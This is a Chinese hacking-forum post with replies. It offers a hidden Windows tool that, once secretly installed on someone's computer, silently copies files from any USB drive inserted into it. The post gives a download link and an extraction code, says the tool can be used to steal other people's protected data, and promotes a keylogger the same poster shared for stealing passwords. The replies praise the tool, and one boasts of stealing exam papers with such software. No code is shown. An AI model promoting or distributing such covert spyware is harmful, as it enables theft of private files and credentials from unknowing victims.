吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[Windows] 插入U盘自动复制文件到电脑工具【暗渡陈仓】

tiansisid 发表于 2019-8-24 22:34

上次发了一个键盘记录软件用来盗取密码等信息,大火,谢谢各位的支持,今天再发布一款珍藏很久的U盘文件自动隐藏拷贝的软件。

现代化办公有些重要东西要么在电脑中加密保存,要么是放在U盘里面,防止被人盗取

所谓道高一尺魔高一丈,你可以在他或者自己的电脑偷偷安装打开这款软件,设置好了,它会帮你弄到自己想要的东西。

现在介绍一下,本软件文件非常小,方便转移,但是功能非常强大满意,分2款:xp+win7 和win8+win10,无法打开请以管理员身份运行,支持隐藏图标,隐藏后只能任务管理器停止软件

2.png 1.png

链接:https://pan.baidu.com/s/1LRRpwFAKNO_pjWSUdNuGuQ     提取码:mle8
一次分享永久有效,不希望论坛的朋友需要的时候本链接失效了的情况,满意的留下免费的评分和热心,你们的支持是我分享的动力!谢谢~

更多经典分享:
1.戏窗口一键隐藏,上班摸鱼好伴侣     https://www.52pojie.cn/thread-1006849-1-1.html
2.安卓骁龙CPU锁频及游戏优化加速3款软件      https://www.52pojie.cn/thread-995439-1-1.html
3.键盘记录神器,支持远程服务对方操作记录      https://www.52pojie.cn/thread-1007156-1-1.html
4.文件夹加锁工具       https://www.52pojie.cn/thread-1013589-1-1.html

免费评分

hsg6722699 + 1 + 1 谢谢@Thanks!
ly_16 + 1 + 1 谢谢@Thanks!
wsszz + 1 + 1 热心回复!
胖球吾爱破解 + 1 + 1 谢谢@Thanks!
梦断花落终成空 + 1 + 1 我很赞同!
zkp + 1 + 1 热心回复!
丶man + 1 + 1 谢谢@Thanks!
lzx0725 + 1 + 1 谢谢@Thanks!
houhongye + 1 + 1 谢谢@Thanks!
rogers + 1 + 1 谢谢@Thanks!
hnhbgz + 1 + 1 谢谢@Thanks!
可是那又怎样 + 1 用心讨论,共获提升!
漂泊的雪 + 1 + 1 用心讨论,共获提升!
wjq1101 + 1 我很赞同!
yazl + 1 + 1 我很赞同!
GL62662 + 1 我很赞同!
liuq2007 + 1 + 1 谢谢@Thanks!
Pony21 + 1 + 1 谢谢@Thanks!
wa050095 + 1 我很赞同!
a427526 + 1 我很赞同!
StevenK + 1 + 1 谢谢@Thanks!
七个小矮人 + 1 + 1 谢谢@Thanks!
红月落影 + 1 + 1 我很赞同!
yp4z719 + 1 谢谢@Thanks!
王金彪 + 1 + 1 谢谢@Thanks!
龙兴天下 + 1 + 1 谢谢@Thanks!
nicwg + 1 + 1 用心讨论,共获提升!
筱颐 + 1 + 1 我很赞同!以后应该会有用吧
ywing123 + 1 + 1 我很赞同!
小号罢了 + 1 + 1 我很赞同!
水煮渔民 + 1 + 1 谢谢@Thanks!
VenomIT + 1 + 1 谢谢@Thanks!
秀秀 + 1 我很赞同!
哈士矫情 + 1 我很赞同!
kivenW + 1 + 1 我很赞同!
M.Tung + 1 + 1 用心讨论,共获提升!
学而后知吾知 + 1 + 1 热心回复!
c丑八怪cc + 1 谢谢@Thanks!
musou_liky + 1 + 1 谢谢@Thanks!
tys18 + 1 + 1 我很赞同!
数论基础 + 1 + 1 谢谢@Thanks!
果果vip9 + 1 谢谢@Thanks!
区块浏览器 + 1 + 1 我很赞同!
吾梦琉璃 + 1 我很赞同!
jhcharlie + 1 + 1 谢谢@Thanks!
白逸轩 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
kalen123 + 1 + 1 谢谢@Thanks!
汐诺 + 1 + 1 谢谢@Thanks!
花了一妓 + 1 我很赞同!
elaola + 1 热心回复!
yelving + 1 + 1 我很赞同!
dongxu818 + 1 + 1 谢谢@Thanks!
475819960 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
来份蛋肉肠 + 1 + 1 热心回复!
ljy583823 + 1 + 1 我很赞同!
esperanto + 1 + 1 谢谢@Thanks!
x66 + 1 respect 给到
zldushiyou + 1 + 1 谢谢@Thanks!
DF59511 + 1 我很赞同!
Timtimxxz + 1 + 1 偷试卷的你就不怕GG= =我同学空军的眼睛然后买通了高考的排座老师让他朋友.
rubingh + 1 + 1 谢谢@Thanks!
虎王1990 + 1 + 1 我很赞同!
我的睡公主 + 1 热心回复!
萧筱小 + 1 谢谢@Thanks!
IMNEUQer + 1 + 1 谢谢@Thanks!
haidao911 + 1 + 1 用心讨论,共获提升!
hm111111 + 1 + 1 谢谢@Thanks!
zhao9426 + 1 + 1 我很赞同!
someone丶 + 1 + 1 谢谢@Thanks!
墨芜 + 1 + 1 热心回复!
首席鉴淫师 + 2 + 1 读书的时候用这类软件偷过期末试卷哈哈哈哈
仿佛悟道 + 1 + 1 已经处理,感谢您对吾爱破解论坛的支持!
way824325223 + 1 + 1 谢谢@Thanks!
生而为人. + 1 + 1 我很赞同!
fyz2007 + 1 谢谢@Thanks!
joneqm + 1 + 1 用心讨论,共获提升!

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

首席鉴淫师 发表于 2019-8-24 23:00
读书的时候用这类软件偷过期末试卷哈哈哈哈
tjx0722 发表于 2019-8-31 15:13
楼主我想问下这个如果电脑硬盘空间不够了,然后运行这个软件的时候会不会有什么问题。
就比如我硬盘还有5个g空间,但是别人u盘有10个g的东西这种情况
寂寞ㄨ如ヮ雪 发表于 2019-8-24 22:37
头像被屏蔽
浣溪沙 发表于 2019-8-24 22:39
canwapjlt 发表于 2019-8-24 22:40
谢谢楼主分享。保存了
lan2602144404 发表于 2019-8-24 22:46
收藏了,谢谢分享
masihong 发表于 2019-8-24 22:54
软件功能不错,就是感觉太那个
仿佛悟道 发表于 2019-8-24 22:55
好东西呀,果断下载收藏备用了,感谢楼主无私分享!
头像被屏蔽
coradong1985 发表于 2019-8-24 23:06
peterq521 发表于 2019-8-24 23:10
5.11一直没有更新啊